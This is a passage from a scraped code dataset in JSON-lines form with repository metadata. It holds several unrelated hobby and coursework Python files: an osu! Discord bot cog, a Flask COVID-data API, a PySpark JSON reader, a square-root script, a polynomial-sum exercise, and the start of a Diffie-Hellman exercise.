await self.disp_beatmap(message, beatmap_info, url)\r\n elif url.find('https://osu.ppy.sh/b/') != -1:\r\n beatmap_id = url.replace('https://osu.ppy.sh/b/','')\r\n beatmap_info = await get_beatmap(key, self.osu_settings[\"type\"][\"default\"], beatmap_id)\r\n await self.disp_beatmap(message, beatmap_info, url)\r\n except:\r\n await self.bot.send_message(message.channel, \"That beatmap doesn't exist.\")\r\n\r\n # displays the beatmap properly\r\n async def disp_beatmap(self, message, beatmap, beatmap_url:str):\r\n # process time\r\n num_disp = min(len(beatmap), self.max_map_disp)\r\n if (len(beatmap)>self.max_map_disp):\r\n msg = \"Found {} maps, but only displaying {}.\\n\".format(len(beatmap), self.max_map_disp)\r\n else:\r\n msg = \"Found {} map(s).\\n\".format(len(beatmap))\r\n\r\n beatmap_msg = \"\"\r\n m, s = divmod(int(beatmap[0]['total_length']), 60)\r\n tags = beatmap[0]['tags']\r\n if tags == \"\":\r\n tags = \"-\"\r\n desc = ' **Length:** {}:{} **BPM:** {}\\n**Tags:** {}\\n------------------'.format(m, str(s).zfill(2), beatmap[0]['bpm'], tags)\r\n em = discord.Embed(description = desc, colour=0xeeeeee)\r\n em.set_author(name=\"{} - {} by {}\".format(beatmap[0]['artist'], beatmap[0]['title'], beatmap[0]['creator']), url=beatmap_url)\r\n\r\n # sort maps\r\n map_order = []\r\n for i in range(num_disp):\r\n map_order.append((i,float(beatmap[i]['difficultyrating'])))\r\n\r\n map_order = sorted(map_order, key=operator.itemgetter(1), reverse=True)\r\n\r\n for i, diff in map_order:\r\n beatmap_info = \"\"\r\n beatmap_info += \"**▸Difficulty:** {:.2f}★ **Max Combo:** {}\\n\".format(float(beatmap[i]['difficultyrating']), beatmap[i]['max_combo'])\r\n beatmap_info += \"**▸AR:** {} **▸OD:** {} **▸HP:** {} **▸CS:** {}\\n\".format(beatmap[i]['diff_approach'], beatmap[i]['diff_overall'], beatmap[i]['diff_drain'], beatmap[i]['diff_size'])\r\n em.add_field(name = \"__{}__\\n\".format(beatmap[i]['version']), value = beatmap_info, inline = False)\r\n\r\n page = urllib.request.urlopen(beatmap_url)\r\n soup = 
BeautifulSoup(page.read(), \"html.parser\")\r\n map_image = [x['src'] for x in soup.findAll('img', {'class': 'bmt'})]\r\n map_image_url = 'http:{}'.format(map_image[0]).replace(\" \", \"%\")\r\n # await self.bot.send_message(message.channel, map_image_url)\r\n em.set_thumbnail(url=map_image_url)\r\n await self.bot.send_message(message.channel, msg, embed = em)\r\n\r\n # --------------------- Tracking Section -------------------------------\r\n @osutrack.command(pass_context=True, no_pm=True)\r\n async def list(self, ctx):\r\n \"\"\"Check which players are currently tracked\"\"\"\r\n server = ctx.message.server\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n\r\n em = discord.Embed(colour=user.colour)\r\n em.set_author(name=\"Osu! Players Currently Tracked in {}\".format(server.name), icon_url = server.icon_url)\r\n channel_users = {}\r\n\r\n target_channel = None\r\n for username in self.track.keys():\r\n if server.id in self.track[username][\"servers\"]:\r\n target_channel = find(lambda m: m.id == self.track[username]['servers'][server.id][\"channel\"], server.channels)\r\n if target_channel.name not in channel_users:\r\n channel_users[target_channel.name] = []\r\n channel_users[target_channel.name].append(username)\r\n\r\n if target_channel and channel_users[target_channel.name]:\r\n channel_users[target_channel.name] = sorted(channel_users[target_channel.name])\r\n for channel_name in channel_users.keys():\r\n em.add_field(name = \"__#{} ({})__\".format(channel_name, len(channel_users[channel_name])), value = \", \".join(channel_users[channel_name]))\r\n else:\r\n em.description = \"None.\"\r\n\r\n await self.bot.say(embed = em)\r\n\r\n @osutrack.command(pass_context=True, no_pm=True)\r\n @checks.mod_or_permissions(manage_messages=True)\r\n async def add(self, ctx, *usernames):\r\n \"\"\"Adds a player to track for top scores.\"\"\"\r\n server = ctx.message.server\r\n channel = ctx.message.channel\r\n\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n msg = \"\"\r\n count_add = 0\r\n\r\n if usernames == (None):\r\n await self.bot.say(\"Please enter a user\")\r\n return\r\n\r\n for username in usernames:\r\n userinfo = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 0))\r\n if not userinfo or len(userinfo) == 0:\r\n msg+=\"`{}` does not exist in the osu! database.\\n\".format(username)\r\n else:\r\n if username not in self.track:\r\n self.track[username] = {}\r\n\r\n if server.id not in self.track[username]:\r\n self.track[username][\"servers\"] = {}\r\n self.track[username][\"servers\"][server.id] = {}\r\n\r\n # add channels that care about the user\r\n if \"channel\" not in self.track[username][\"servers\"][server.id]:\r\n self.track[username][\"servers\"][server.id][\"channel\"] = channel.id\r\n\r\n # add current userinfo\r\n if \"userinfo\" not in self.track[username]:\r\n self.track[username][\"userinfo\"] = {}\r\n for mode in modes:\r\n self.track[username][\"userinfo\"][mode] = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, self._get_gamemode_number(mode)))[0]\r\n\r\n # add last tracked time\r\n current_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n self.track[username][\"last_check\"] = current_time\r\n count_add += 1\r\n msg+=\"**`{}` added. 
Will now track on `#{}`**\\n\".format(username, channel.name)\r\n else:\r\n if server.id in self.track[username][\"servers\"]:\r\n if channel.id == self.track[username][\"servers\"][server.id][\"channel\"]:\r\n msg+=\"**Already tracking `{}` on `#{}.`**\\n\".format(username, channel.name)\r\n else:\r\n self.track[username][\"servers\"][server.id][\"channel\"] = channel.id # add a channel to track\r\n count_add += 1\r\n msg+=\"**`{}` now tracking on `#{}`**\\n\".format(username, channel.name)\r\n else:\r\n if server.id not in self.track[username][\"servers\"]:\r\n self.track[username][\"servers\"][server.id] = {}\r\n self.track[username][\"servers\"][server.id][\"channel\"] = channel.id # add a channel to track\r\n count_add += 1\r\n msg+=\"**`{}` added. Will now track on `#{}`**\\n\".format(username, channel.name)\r\n\r\n fileIO(\"data/osu/track.json\", \"save\", self.track)\r\n if len(msg) > 500:\r\n await self.bot.say(\"**Added `{}` users to tracking on `#{}`.**\".format(count_add, channel.name))\r\n else:\r\n await self.bot.say(msg)\r\n\r\n @osutrack.command(pass_context=True, no_pm=True)\r\n @checks.mod_or_permissions(manage_messages=True)\r\n async def remove(self, ctx, *usernames:str):\r\n \"\"\"Removes a player to track for top scores.\"\"\"\r\n server = ctx.message.server\r\n channel = ctx.message.channel\r\n msg = \"\"\r\n count_remove = 0\r\n\r\n if usernames == (None):\r\n await self.bot.say(\"Please enter a user\")\r\n return\r\n\r\n for username in usernames:\r\n if username in self.track and \"servers\" in self.track[username] and server.id in self.track[username][\"servers\"]:\r\n if channel.id == self.track[username][\"servers\"][server.id][\"channel\"]:\r\n del self.track[username][\"servers\"][server.id]\r\n if len(self.track[username][\"servers\"].keys()) == 0:\r\n del self.track[username]\r\n msg+=\"**No longer tracking `{}` in `#{}`.**\\n\".format(username, channel.name)\r\n count_remove += 1\r\n fileIO(\"data/osu/track.json\", \"save\", self.track)\r\n else:\r\n msg+=\"**`{}` is not currently being tracked in `#{}`.**\\n\".format(username, channel.name)\r\n else:\r\n msg+=\"**`{}` is not currently being tracked.**\\n\".format(username)\r\n\r\n if len(msg) > 500:\r\n await self.bot.say(\"**Removed `{}` users from tracking on `#{}`.**\".format(count_remove, channel.name))\r\n else:\r\n await self.bot.say(msg)\r\n\r\n # used to track top plays of specified users\r\n async def play_tracker(self):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n while self == self.bot.get_cog('Osu'):\r\n # get all keys() to grab all current tracking users\r\n log.debug(\"looping through all users\")\r\n for username in self.track.keys():\r\n log.debug(\"checking {}\".format(username))\r\n # if the user's current top 10 scores are different from new top 10\r\n try:\r\n new_plays = {}\r\n for mode in modes:\r\n new_plays[mode] = await get_user_best(key, self.osu_settings[\"type\"][\"default\"], username, self._get_gamemode_number(mode), self.osu_settings[\"num_track\"])\r\n\r\n # gamemode = word\r\n for gamemode in self.track[username][\"userinfo\"].keys():\r\n log.debug(\"examining gamemode {}\".format(gamemode))\r\n last_check = datetime.datetime.strptime(self.track[username][\"last_check\"], '%Y-%m-%d %H:%M:%S')\r\n new_timestamps = []\r\n for new_play in new_plays[gamemode]:\r\n new_timestamps.append(datetime.datetime.strptime(new_play['date'], '%Y-%m-%d %H:%M:%S'))\r\n current_info = self.track[username][\"userinfo\"][gamemode] # user information\r\n score_gamemode = 
self._get_gamemode_display(gamemode)\r\n\r\n # loop to check what's different\r\n for i in range(len(new_timestamps)):\r\n if last_check != None and new_timestamps[i] != None and new_timestamps[i] > last_check:\r\n #print(\"Comparing new {} to old {}\".format(new_timestamps[i], last_check))\r\n top_play_num = i+1\r\n play = new_plays[gamemode][i]\r\n play_map = await get_beatmap(key, self.osu_settings[\"type\"][\"default\"], play['beatmap_id'])\r\n new_user_info = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, self._get_gamemode_number(gamemode)))\r\n new_user_info = new_user_info[0]\r\n\r\n # send appropriate message to channel\r\n log.debug(\"creating top play\")\r\n if gamemode in self.track[username][\"userinfo\"]:\r\n old_user_info = self.track[username][\"userinfo\"]\r\n em = self._create_top_play(top_play_num, play, play_map, old_user_info[gamemode], new_user_info, score_gamemode)\r\n else:\r\n old_user_info = None\r\n em = self._create_top_play(top_play_num, play, play_map, old_user_info, new_user_info, score_gamemode)\r\n\r\n log.debug(\"sending embed\")\r\n for server_id in self.track[username]['servers'].keys():\r\n server = find(lambda m: m.id == server_id, self.bot.servers)\r\n if server_id not in self.osu_settings or \"tracking\" not in self.osu_settings[server_id] or self.osu_settings[server_id][\"tracking\"] == True:\r\n channel = find(lambda m: m.id == self.track[username]['servers'][server_id][\"channel\"], server.channels)\r\n await self.bot.send_message(channel, embed = em)\r\n\r\n #print(\"Setting last changed time to {}\".format(new_timestamps[i]))\r\n self.track[username][\"userinfo\"][gamemode] = new_user_info\r\n self.track[username][\"last_check\"] = new_timestamps[i].strftime('%Y-%m-%d %H:%M:%S')\r\n fileIO(\"data/osu/track.json\", \"save\", self.track)\r\n break\r\n except:\r\n log.info(\"Failed to load top score for\".format(username))\r\n\r\n log.debug(\"sleep 60 seconds\")\r\n await asyncio.sleep(60)\r\n\r\n def _create_top_play(self, top_play_num, play, beatmap, old_user_info, new_user_info, gamemode):\r\n beatmap_url = 'https://osu.ppy.sh/b/{}'.format(play['beatmap_id'])\r\n user_url = 'https://{}/u/{}'.format(self.osu_settings[\"type\"][\"default\"], new_user_info['user_id'])\r\n profile_url = 'http://s.ppy.sh/a/{}.png'.format(new_user_info['user_id'])\r\n beatmap = beatmap[0]\r\n\r\n # get infomation\r\n log.debug(\"getting change information\")\r\n m, s = divmod(int(beatmap['total_length']), 60)\r\n mods = self.mod_calculation(play['enabled_mods'])\r\n if not mods:\r\n mods = []\r\n mods.append('No Mod')\r\n em = discord.Embed(description='', colour=0xeeeeee)\r\n acc = self.calculate_acc(play, int(beatmap['mode']))\r\n\r\n # grab beatmap image\r\n log.debug(\"getting map image\")\r\n page = urllib.request.urlopen(beatmap_url)\r\n soup = BeautifulSoup(page.read(), \"html.parser\")\r\n map_image = [x['src'] for x in soup.findAll('img', {'class': 'bmt'})]\r\n map_image_url = 'http:{}'.format(map_image[0])\r\n em.set_thumbnail(url=map_image_url)\r\n log.debug(\"creating embed\")\r\n em.set_author(name=\"New #{} for {} in {}\".format(top_play_num, new_user_info['username'], gamemode), icon_url = profile_url, url = user_url)\r\n\r\n info = \"\"\r\n info += \"▸ [**__{} [{}]__**]({})\\n\".format(beatmap['title'], beatmap['version'], beatmap_url)\r\n info += \"▸ +{} ▸ **{:.2f}%** ▸ **{}** Rank\\n\".format(','.join(mods), float(acc), play['rank'])\r\n info += \"▸ **{:.2f}★** ▸ {}:{} ▸ 
{}bpm\\n\".format(float(beatmap['difficultyrating']), m, str(s).zfill(2), beatmap['bpm'])\r\n if old_user_info != None:\r\n dpp = float(new_user_info['pp_raw']) - float(old_user_info['pp_raw'])\r\n info += \"▸ {} ▸ x{} ▸ **{:.2f}pp (+{:.2f})**\\n\".format(play['score'], play['maxcombo'], float(play['pp']), dpp)\r\n info += \"▸ #{} → #{} ({}#{} → #{})\".format(old_user_info['pp_rank'], new_user_info['pp_rank'], new_user_info['country'], old_user_info['pp_country_rank'], new_user_info['pp_country_rank'])\r\n else:\r\n info += \"▸ {} ▸ x{} ▸ **{:.2f}pp**\\n\".format(play['score'], play['maxcombo'], float(play['pp']))\r\n info += \"▸ #{} ({}#{})\".format(new_user_info['pp_rank'], new_user_info['country'], new_user_info['pp_country_rank'])\r\n em.description = info\r\n return em\r\n\r\n###-------------------------Python wrapper for osu! api-------------------------\r\n\r\n# Gets the beatmap\r\nasync def get_beatmap(key, api:str, beatmap_id):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"b\", beatmap_id))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_beatmaps?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Gets the beatmap set\r\nasync def get_beatmapset(key, api:str, set_id):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"s\", set_id))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_beatmaps?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Grabs the scores\r\nasync def get_scores(key, api:str, beatmap_id, user_id, mode):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"b\", beatmap_id))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_scores?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\nasync def get_user(key, api:str, user_id, mode):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_user?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\nasync def get_user_best(key, api:str, user_id, mode, limit):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n url_params.append(parameterize_limit(limit))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_user_best?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Returns the user's ten most recent plays.\r\nasync def get_user_recent(key, api:str, user_id, mode):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_user_recent?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Returns the full API request URL using the provided base URL and parameters.\r\ndef build_request(url_params, url):\r\n for param in url_params:\r\n url += str(param)\r\n if (param != \"\"):\r\n url += \"&\"\r\n return url[:-1]\r\n\r\ndef parameterize_event_days(event_days):\r\n if (event_days 
== \"\"):\r\n event_days = \"event_days=1\"\r\n elif (int(event_days) >= 1 and int(event_days) <= 31):\r\n event_days = \"event_days=\" + str(event_days)\r\n else:\r\n print(\"Invalid Event Days\")\r\n return event_days\r\n\r\ndef parameterize_id(t, id):\r\n if (t != \"b\" and t != \"s\" and t != \"u\" and t != \"mp\"):\r\n print(\"Invalid Type\")\r\n if (len(str(id)) != 0):\r\n return t + \"=\" + str(id)\r\n else:\r\n return \"\"\r\n\r\ndef parameterize_key(key):\r\n if (len(key) == 40):\r\n return \"k=\" + key\r\n else:\r\n print(\"Invalid Key\")\r\n\r\ndef parameterize_limit(limit):\r\n ## Default case: 10 scores\r\n if (limit == \"\"):\r\n limit = \"limit=10\"\r\n elif (int(limit) >= 1 and int(limit) <= 100):\r\n limit = \"limit=\" + str(limit)\r\n else:\r\n print(\"Invalid Limit\")\r\n return limit\r\n\r\ndef parameterize_mode(mode):\r\n ## Default case: 0 (osu!)\r\n if (mode == \"\"):\r\n mode = \"m=0\"\r\n elif (int(mode) >= 0 and int(mode) <= 3):\r\n mode = \"m=\" + str(mode)\r\n else:\r\n print(\"Invalid Mode\")\r\n return mode\r\n\r\n###-------------------------Setup-------------------------\r\ndef check_folders():\r\n if not os.path.exists(\"data/osu\"):\r\n print(\"Creating data/osu folder...\")\r\n os.makedirs(\"data/osu\")\r\n\r\ndef check_files():\r\n osu_api_key = {\"osu_api_key\" : \"\"}\r\n api_file = \"data/osu/apikey.json\"\r\n\r\n if not fileIO(api_file, \"check\"):\r\n print(\"Adding data/osu/apikey.json...\")\r\n fileIO(api_file, \"save\", osu_api_key)\r\n else: # consistency check\r\n current = fileIO(api_file, \"load\")\r\n if current.keys() != osu_api_key.keys():\r\n for key in system.keys():\r\n if key not in osu_api_key.keys():\r\n current[key] = osu_api_key[key]\r\n print(\"Adding \" + str(key) +\r\n \" field to osu apikey.json\")\r\n fileIO(api_file, \"save\", current)\r\n\r\n # creates file for user backgrounds\r\n user_file = \"data/osu/user_settings.json\"\r\n if not fileIO(user_file, \"check\"):\r\n print(\"Adding data/osu/user_settings.json...\")\r\n fileIO(user_file, \"save\", {})\r\n\r\n # creates file for player tracking\r\n user_file = \"data/osu/track.json\"\r\n if not fileIO(user_file, \"check\"):\r\n print(\"Adding data/osu/track.json...\")\r\n fileIO(user_file, \"save\", {})\r\n\r\n # creates file for server to use\r\n settings_file = \"data/osu/osu_settings.json\"\r\n if not fileIO(settings_file, \"check\"):\r\n print(\"Adding data/osu/osu_settings.json...\")\r\n fileIO(settings_file, \"save\", {\r\n \"type\": {\r\n \"default\": \"osu.ppy.sh\",\r\n \"ripple\":\"ripple.moe\"\r\n },\r\n \"num_track\" : 50,\r\n \"num_best_plays\": 5,\r\n })\r\n\r\ndef setup(bot):\r\n check_folders()\r\n check_files()\r\n\r\n n = Osu(bot)\r\n loop = asyncio.get_event_loop()\r\n loop.create_task(n.play_tracker())\r\n bot.add_listener(n.find_link, \"on_message\")\r\n bot.add_cog(n)\r\n","repo_name":"AznStevy/Maybe-Useful-Cogs","sub_path":"osu/osu.py","file_name":"osu.py","file_ext":"py","file_size_in_byte":57308,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"81"} +{"seq_id":"71689234825","text":"from decouple import config\n\nimport os\nimport sys\nimport subprocess\nsubprocess.call(['pip3', 'install', '-r', 'requirements.txt'])\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask import request\nfrom default_json_data import Default_JSON_Data\nfrom countries import Countries\n\nimport import_data\nimport user_interact\nimport example_graphs\n\nimport numpy as np\nimport pandas as pd\nimport datetime as DT 
\nimport json\n\nWHO_DATA_SET = import_data.WHO_Data_Set() \ndata = json.loads(WHO_DATA_SET.rtn_dt_json())\n\n# Loop through\n# Look at countries to build an array of them.\n\nWHO_DATA_SET.sortCountries(data)\n\napp = Flask(__name__)\nCORS(app)\n\n# Functions\ndef to_json(obj):\n json_str = json.dumps(obj.__dict__)\n return json.loads(json_str)\n \n@app.route('/', methods=['GET'])\ndef index():\n return {\n\t 'message': 'API is operational',\n 'status': '200'\n }\n\n@app.route('/worldwide', methods=['GET'])\ndef worldwide():\n # arg = request.args.get('country')\n # print('arg')\n # print(arg)\n # return_data_index = WHO_DATA_SET.find_country_index(arg)\n # return data[return_data_index]\n\n # Get Country Data:\n country = request.args.get(\"country\")\n index = WHO_DATA_SET.find_country_index(country)\n country_rtn = data[index]\n\n # Get Global Data:\n global_rtn = data[0]\n\n # Get Continental Data:\n countries_within_region = WHO_DATA_SET.find_countries_within_region(data, data[index][\"WHO Region\"])\n \n\n return to_json(Default_JSON_Data(global_rtn, country_rtn, countries_within_region))\n\n@app.route('/who-countries', methods=['GET'])\ndef who_countries():\n rtn_countries = []\n\n for i in data:\n rtn_countries.append(i[\"Name\"])\n\n my_json = to_json(Countries(rtn_countries))\n return my_json\n\n@app.route('/defaultData', methods=['GET'])\ndef defaultData():\n return {\n 'names': ['Deaths / Recoveries', 'Information for each country in: ', 'Deaths / Recoveries / Living / Infected'],\n 'continent': 'Europe',\n 'Country': 'UK'\n }\n \n@app.route('/', defaults={'path': ''})\n@app.route('/<path:path>', methods=['GET'])\ndef catch_all(path):\n return {\n 'status': '404',\n\t 'message': 'Request not found'\n }\n\nif config('environment') == \"production\":\n app.run()\nelif __name__ == '__main__':\n app.run(debug=True)\n\n\n# /help command\n#testinput - input(\"Type /Help for commands: \")\n#if testinput == '/Help':\n# print(\"placeholer\")\n\n# # Getting todays date\n# today = DT.date.today()\n# # Getting date of 7 days ago?\n# #week = today - DT.timedelta(days-7)\n# print(today)\n\n# import_data.WHO_Data_Set()\n# a = example_graphs.Data_To_JSON([\"India\"], \"Cases - cumulative total\")\n# #import_data.WHO_Data_Set.Test_Graph()\n# #example_graphs.Data_To_JSON()\n\n# example_graphs.Test_Graph()\n# print('hello')\n# print(a)\n# #Run the app.s\n# #if __name__ == '__main__':\n# #\tapp.run(host='localhost', debug=True)\n\n\n\n","repo_name":"Jack-Hartman/UoL-TSE-G34","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"8247776128","text":"from pyspark.sql import SparkSession\n\n\nclass ReadJson:\n @staticmethod\n def json_read():\n # Creating Spark Session\n spark = SparkSession.builder.appName(\"ReadJson\").master(\"local[*]\").getOrCreate()\n\n # Read JSON file into dataframe\n read_json_date = spark.read.json('C:\\\\Project\\\\Files\\\\Input\\\\json\\\\office.json').cache()\n # read_json_date = spark.read.json.path('C:\\Project\\Files\\Input\\json\\Sample-JSON.json')\n\n print(read_json_date.show())\n\n\nif __name__ == \"__main__\":\n ReadJson.json_read()\n","repo_name":"ripattna/Project","sub_path":"PySpark/com/dataframe/ReadJson.py","file_name":"ReadJson.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} 
+{"seq_id":"15839416114","text":"n=int(input(\"enter a number to find square root\"))\r\nh=int(input(\"enter no of approximation iterations\"))\r\napprox = 0.5 * n\r\nfor i in range(h):\r\n betterapprox = 0.5 * (approx + n/approx)\r\n approx = betterapprox\r\n\r\nprint(approx)\r\n\r\nprint(\"another way\")\r\nn=int(input(\"enter a number to find square root\"))\r\n\r\napprox = 0.5 * n\r\nbetter = 0.5 * (approx + n/approx)\r\nwhile better != approx:\r\n approx = better\r\n better = 0.5 * (approx + n/approx)\r\nprint(approx)\r\n\r\n","repo_name":"sureshanandcse/Python","sub_path":"squareroot_NR.py","file_name":"squareroot_NR.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36490828560","text":"# Даны два файла, в каждом из которых находится запись многочлена. Задача - сформировать файл,\n# содержащий сумму многочленов.\nimport random\n\n\ndef fill_list_nums(a, b, len):\n list_nums = []\n for item in range(len):\n list_nums.append(random.randint(a, b))\n return list_nums\n\n\ndef get_first_position_not_zero(list):\n result = -1\n for item in range(len(list) - 1, -1, -1):\n if list[item] != 0:\n result = item\n break\n return result\n\n\ndef isZero(list, pos):\n result = False\n if list[pos] == 0:\n result = True\n return result\n\n\ndef generate_x(coef, deg):\n coef = str(abs(coef))\n deg = str(abs(deg))\n if coef == '0': return ''\n # if coef == '1': coef = ''\n deg_out = 'x^' + deg\n if deg == '0': deg_out = ''\n if deg == '1': deg_out = 'x'\n return coef + deg_out\n\n\n# def get_polynomial(list):\n# s = ''\n# j = get_first_position_not_zero(list)\n# s += generate_x(list[j], len(list) - j)\n# for k in range(len(list) - j, 0, -1):\n# x = generate_x(list[k - 1], k - 1)\n# print(list[k - 1], k - 1, x)\n# if x == '':\n# continue\n# s += ' + ' + x\n# print(s)\n\ndef get_polynomial(list):\n s = ''\n for i in range(len(list)):\n if i != len(list) - 1 and list[i] != 0 and i != len(list) - 2:\n s += f'{list[i]}x^{len(list) - i - 1}'\n if list[i + 1] != 0:\n s += ' + '\n elif i == len(list) - 2 and list[i] != 0:\n s += f'{list[i]}x'\n if list[i + 1] != 0:\n s += ' + '\n elif i == len(list) - 1 and list[i] != 0:\n s += f'{list[i]} = 0'\n elif i == len(list) - 1 and list[i] == 0:\n s += ' = 0'\n return s\n\n\n# получение степени многочлена\ndef get_deg(k):\n if 'x^' in k:\n i = k.find('^')\n num = int(k[i + 1:])\n elif ('x' in k) and ('^' not in k):\n num = 1\n else:\n num = -1\n return num\n\n\n# получение коэффицента члена многочлена\ndef get_coef(k):\n if 'x' in k:\n i = k.find('x')\n num = int(k[:i])\n return num\n\n\n# разбор многочлена и получение его коэффициентов\ndef calc_mn(st):\n st = st[0].replace(' ', '').split('=')\n st = st[0].split('+')\n lst = []\n l = len(st)\n k = 0\n if get_deg(st[-1]) == -1:\n lst.append(int(st[-1]))\n l -= 1\n k = 1\n i = 1 # степень\n ii = l - 1 # индекс\n while ii >= 0:\n if get_deg(st[ii]) != -1 and get_deg(st[ii]) == i:\n lst.append(get_coef(st[ii]))\n ii -= 1\n i += 1\n else:\n lst.append(0)\n i += 1\n\n return lst\n\n\n# создание двух файлов\nmin = 0\nmax = 100\nk1 = int(input(\"Введите натуральную степень многочлена k1 = \"))\nk2 = int(input(\"Введите натуральную степень многочлена k2 = \"))\nlist1 = fill_list_nums(min, max + 1, k1 + 1)\nlist2 = fill_list_nums(min, max + 1, k2 + 1)\n\npos_not_zero = get_first_position_not_zero(list1)\nif len(list1) == 0 or pos_not_zero == -1:\n print('Многочлен невозможно создать len = 0 or pos_not_zero == -1')\n 
exit()\npolynomial1 = get_polynomial(list1)\nprint(polynomial1)\nwith open('polynomial1.txt', 'w') as data:\n data.write(polynomial1)\n\npos_not_zero = get_first_position_not_zero(list2)\nif len(list2) == 0 or pos_not_zero == -1:\n print('Многочлен невозможно создать len = 0 or pos_not_zero == -1')\n exit()\npolynomial2 = get_polynomial(list2)\nprint(polynomial2)\nwith open('polynomial2.txt', 'w') as data:\n data.write(polynomial2)\n\n# нахождение суммы многочлена\n\nwith open('polynomial1.txt', 'r') as data:\n polynomial1 = data.readlines()\nwith open('polynomial2.txt', 'r') as data:\n polynomial2 = data.readlines()\nprint(f\"Первый многочлен {polynomial1}\")\nprint(f\"Второй многочлен {polynomial2}\")\nlst1 = calc_mn(polynomial1)\nlst2 = calc_mn(polynomial2)\nll = len(lst1)\nif len(lst1) > len(lst2):\n ll = len(lst2)\nlst_new = [lst1[i] + lst2[i] for i in range(ll)]\nif len(lst1) > len(lst2):\n mm = len(lst1)\n for i in range(ll, mm):\n lst_new.append(lst1[i])\nelse:\n mm = len(lst2)\n for i in range(ll, mm):\n lst_new.append(lst2[i])\npolynomial_sum = get_polynomial(lst_new)\nwith open('polynomial_sum.txt', 'w') as data:\n data.write(polynomial_sum)\nwith open('polynomial_sum.txt', 'r') as data:\n polynomial_sum = data.readlines()\nprint(f\"Результирующий многочлен {polynomial_sum}\")\n","repo_name":"ArtsmanDan/python_base","sub_path":"sem4HW/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72333107466","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nFile: main.py\nAuthor: Sergio Tabares Hernández <alu0101124896@ull.edu.es>\nSince: Sprint 2021\nCollege: University of La Laguna\nDegree: Computer Science - Advanced Artificial Intelligence\nDescription: This program estimates the probabilities of the languaje model\n from given train corpus and classifies the given test corpus documents into\n the learned classes\n\"\"\"\n\nimport time\n\nfrom src.vocabulary_parser import parse_vocabulary\nfrom src.classes_parser import parse_classes\nfrom src.corpus_parser import split_corpus, corpus_to_test\nfrom src.probabilities_estimator import estimate_probabilities\nfrom src.corpus_classifier import classify_corpus, check_precision\n\n\ndef main():\n \"\"\"\n Function to execute everything at once\n \"\"\"\n start = time.perf_counter()\n\n # corpusFile = input(\"Main corpus input file (Default = ./data/ecom-train.csv):\"\n # ) or \"./data/ecom-train.csv\"\n corpus_file = \"./data/ecom-train.csv\"\n\n parse_vocabulary(input_file=corpus_file, output_to_file=True)\n parse_classes(input_file=corpus_file, output_to_file=True)\n split_corpus(input_file=corpus_file, output_to_file=True)\n estimate_probabilities(output_to_file=True)\n corpus_to_test(input_file=corpus_file, output_to_file=True)\n classify_corpus(output_to_file=True)\n check_precision(original_file=corpus_file)\n\n end = time.perf_counter()\n print(f\"\\nThe time spent in the main function was {end - start} seconds\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alu0101124896/NLP-Text-Classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36507183936","text":"#Протокол Деффи-Хелмана\nimport random\ndef chif(p,g):\n\tz=int(input(\"Введите количество участников чата\"))\n\tprint(\"Изначально всем участникам извстны следующее 
